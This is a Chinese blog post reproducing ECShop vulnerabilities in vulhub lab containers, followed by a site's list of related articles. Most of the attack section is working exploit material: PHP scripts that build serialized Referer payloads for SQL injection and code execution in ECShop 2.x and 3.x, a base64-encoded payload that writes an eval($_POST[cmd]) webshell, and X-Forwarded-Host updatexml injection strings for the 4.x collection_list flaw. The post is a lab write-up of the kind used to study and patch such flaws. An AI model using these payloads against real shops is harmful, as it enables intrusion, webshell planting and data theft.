(三)vulhub专栏:Ecshop Sql注入、远程代码执行漏洞复现

已于 2022-08-02 13:42:33 修改
阅读量1.4k 收藏 1
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: sql 数据库
于 2022-07-05 16:49:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014536801/article/details/125623287
版权

xianzhi-2017-02-82239600

启动靶场

在终端里进入事先进入准备好的vulhub靶场目录下,

cd vulhub-master/ecshop/xianzhi-2017-02-82239600
sudo docker-compose up -d

执行命令后

Ecshop2.x:

可在浏览器中输入http://ip:8080,正常访问即为靶场启动成功。

Ecshop3.x:

可在浏览器中输入http://ip:8081,正常访问即为靶场启动成功。

然后分别进行安装即可,数据库地址为mysql,用户名密码均为root

漏洞发现

漏洞成因
  1. Referer值未做任何验证可被控制直接引用
  2. 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a
  3. insert_ads函数的sql拼接不规范导致sql注入
  4. make_val函数拼接字符串,拼接用户输入内容。

经由以上四个步骤即可造成远程代码执行,具体分析可参考文章

漏洞利用

手搓

知道原理后我们就开始利用漏洞了,环境如下:

靶机:192.168.75.146

攻击机:192.168.75.144

首先需要准备准备POC,代码如下:

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>

使用php执行上述代码,生成POC:

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Ecshop2.x POC利用:

在burp中抓包Ecshop用户登录页面,发送到重放器Repeater里,然后将请求信息替换成下方的POC:

GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1

发送后即可得到如下结果,证明漏洞利用成功。

image-20220705155803274

Ecshop3.x POC利用:

在burp中抓包Ecshop用户登录页面,发送到重放器Repeater里,然后将请求信息替换成下方的POC:

GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1

发送后即可得到如下结果,证明漏洞利用成功。

image-20220705160636528

Get WebShell

生成获取WebShell的POC,代码如下:

<?php
$shell = bin2hex("{\$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk='));//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>

// 原型

file_put_contents(‘eval.php’,‘<?php eval($_POST[cmd]); ?>’)

// base64编码

ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=

生成的Get WebShell Poc如下:

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

套入POC利用,再用蚁剑即可连接,连接截图如下:

image-20220705161211474

到此,Ecshop xianzhi-2017-02-82239600 Sql注入、远程代码执行漏洞复现结束。

ECShop 4.x collection_list SQL注入

影响范围

Ecshop 2.x

Ecshop 3.x-3.6.0

漏洞成因

可参考:https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw

漏洞利用

环境准备
名称IP
攻击机192.168.159.132
靶机192.168.159.129

进入靶机的vulhub目录下,输入以下命令启动靶场:

cd ecshop/collection_list-sqli
docker-compose up -d

打开网站http://192.168.159.129:8080,出现安装界面,截图如下:

image-20220802093608150

在安装过程中,数据库地址为mysql,用户名和密码均为root

漏洞复现

首先注册一个测试用户test,然后登录后点击我的收藏,抓包如下图所示:

image-20220802104632045

手动复现

POC:

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|

可以看到如下图所示:

image-20220802104616194

云舒_YunShu
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ECShop
xiwangyizhicunzai的博客
12-21 624
ECShop 2.x/3.x SQL注入/任意代码执行漏洞 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞...
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1337
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
Eecshop 4.x collection_list SQL注入 漏洞复现
weixin_44896127的博客
12-20 591
Eecshop 4.x collection_list SQL注入漏洞复现
vulnhub-Boverflow靶机渗透详细过程
最新发布
nwonknu16的博客
05-10 703
还以为要用溢出,结果也没用到哦,差点忘了,最后还有个小彩蛋结果靶机打完了才想起来之前挂后台的sqlmap,一看,还没跑完。
20 - vulhub - ECShop 2.x/3.x SQL注入/任意代码执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1143
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞vulhub中使用其2.7.3版本与3.6.0次新版本进行漏洞复现。 其实该漏洞复现的意义不是很大,现在都 7.x 8.x 版本了,但是不失为 `了解程序员写bug` 的一种另类方式。
ECSHOP 2.7.x sql注入漏洞分析
weixin_43263451的博客
04-16 3362
ecshop将我们可控的参数渲染进模板时,其中利用到$fun($para) 进行动态调用,而通过精心构造的payload使得$fun和$para我们可控,导致可以调用任何函数,从而达到sql注入 1. POC与复现 POC: Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:1:"1";s:2:"id";s:52:"1' and updatexml(0x7e,concat(0x7e,database()),0x7e)#";} 复现
ECShop 4.x collection_listSQL注入
weixin_56537388的博客
11-27 364
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。访问8080端口,数据库主机为mysql,账号密码为root。注册一个账户然后登录。docker环境搭建。
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞复现
ADummy的博客
02-24 744
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显 0x01漏洞介绍 ​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0
Java Apache中的高危漏洞复现
tpaer的博客
08-12 1415
在15年Apache Commons Collections(ACC)被两位黑客爆出存在`反序列化漏洞`,由于Apache下的其他框架也免不了大量使用像List、Map、Set等Collection类,因此该漏洞覆盖范围非常之大。并且通过此漏洞可以执行任意操作,也是当年最危险的漏洞之一。...
ECShop 2.x/3.x SQL注入/任意代码执行漏洞复现
锋刃科技的博客
01-28 438
简介 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 影响版本 Ecshop 2.x Ecshop 3.x-3.6.0 环境搭建 使用vulhub来安装环境 https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md 进入目录并启动环...
Apache SSI 远程命令执行漏洞
qq_43571759的博客
05-23 748
Apache SSI 远程命令执行漏洞 文章目录Apache SSI 远程命令执行漏洞SSI功能:配置:用法:漏洞分析 SSI 漏洞复现之前,要知道SSI是什么,那么SSI是什么呢? SSI----即server-side includes 功能: SSI提供了一种对现有HTML文档增加动态内容的方法,不需要编写复杂的JSP/PHP/ASP等程序或者调用CGI程序。 配置: 因为是docker拉取...
Collection-List
m0_47520320的博客
03-27 708
* List集合继承了Collection集合的全部功能,同时因为List系列集合有索引 * 因为List集合多了索引,所以多了很多按照索引操作元素的功能 * for循环,Lambda表达式,foreach,迭代器 * ArrayList 是实现类集合底层基于数组存储数据的,查询快,增删慢 * public void add(int index,E element):将指定的元素,添加到该集合中的指定位置 * public E get(int index):返回集..
一道靶场面试题的解题思路
weixin_44508748的博客
06-11 1074
一、缘起 群里老哥丢出来一个某厂的面试靶场,跟着大佬学了些思路,记录如下。 整体流程:sql注入读取网站配置文件>拿到tomcat登录账号密码>登录tomcat上传war包>getshell。以下是脱敏后记录的详细过程: 二、 初探 目标是一个阉割版ecshop搭建的商城系统,利用已公开的漏洞无法拿下… 目标:http://1x.x.x.x:8080/eshop/UserLogin.jsp 直接web路径访问端口:http://1x.x.x.x:8080/发现tomcat的管理界面入口:
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8421
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
漏洞验证之vulhub环境搭建
weixin_44311721的博客
07-30 769
vulhub搭建 简介:通俗的讲,vulhub可以提供一个带有特定漏洞的系统。当我们想要验证各种漏洞,但又苦于各种漏洞软件版本寻找和各种环境搭建时。就可以用到vulhub,它“寄生于“docker”容器,运行完整的漏洞靶场镜像。 docker和docker-compose的安装(两者区别参考大佬文章:docker和docker-compose区别) docker安装 apt-ge...
ECshop 修改100例
小崔真好的专栏
12-04 755
1:如何修改网站"欢迎光临本店"回答:languages\zh_cn\common.php文件中, $_LANG['welcome'] = '欢迎光临本店';将他修改成你需要的字样。2:如何修改首页"热门搜索关键字"    回答:后台->系统设置->网店设置->显示设置->首页搜索关键字,修改他的内容,然后保存3:如何修改首页标题 "Powered by ECShop"回答:includes/li
安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记
AAAAAAAAAAAA66的博客
02-06 3332
题目 网站URL ECSHOP演示站 - Powered by ECShop 目录 笔记 过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询 right 语法爆字段值 笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决) 题目虽然是叫宽字符注入,但实际考察的是报错注入 (挂羊头卖狗肉) 这个网站很大,注入点很难找(我也是看一位师傅的write up) 自己没有...
docker一键安装
weixin_30858241的博客
06-04 256
1、任意新服务器上一键安装最新版docker curl -s https://get.docker.com/ | sh 注:安装完成之后,docker默认是没有启动的,需要启动docker 2、docker-compose安装 Docker-compose用于组合服务与内网。有部分环境涉及到多个容器,且不同环境开启的端口、目录也不相同,所以Vulhub选择使用docker-comp...
ecshop前台漏洞
09-02
ECShop前台漏洞是指在ECShop电商系统的前台界面中存在的安全漏洞。根据引用的资料,ECShop的前台漏洞链主要是基于ECShop过去的漏洞,并以insert_mod为主要入口点。具体来说,在ECShop 4.0.7版本中,漏洞入口点位于user.php文件的第1146行。 在这个漏洞链中,display函数起着重要的作用。在之前的严重漏洞中,display函数也扮演了重要角色。在这次漏洞中,通过读取模板注入后的文件内容,如果存在echash字段,则进行切割分析。 需要注意的是,由于漏洞的具体细节未提供,因此无法提供更加详细的分析。但是可以得出的结论是,在ECShop的前台界面中存在安全漏洞,可能会受到攻击者的利用。因此,建议ECShop用户及时关注官方的安全公告,并及时更新系统补丁以避免受到潜在的攻击风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ECShop 4.0 前台SQL注入漏洞分析(需用户注册)](https://blog.csdn.net/weixin_39711867/article/details/115105521)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值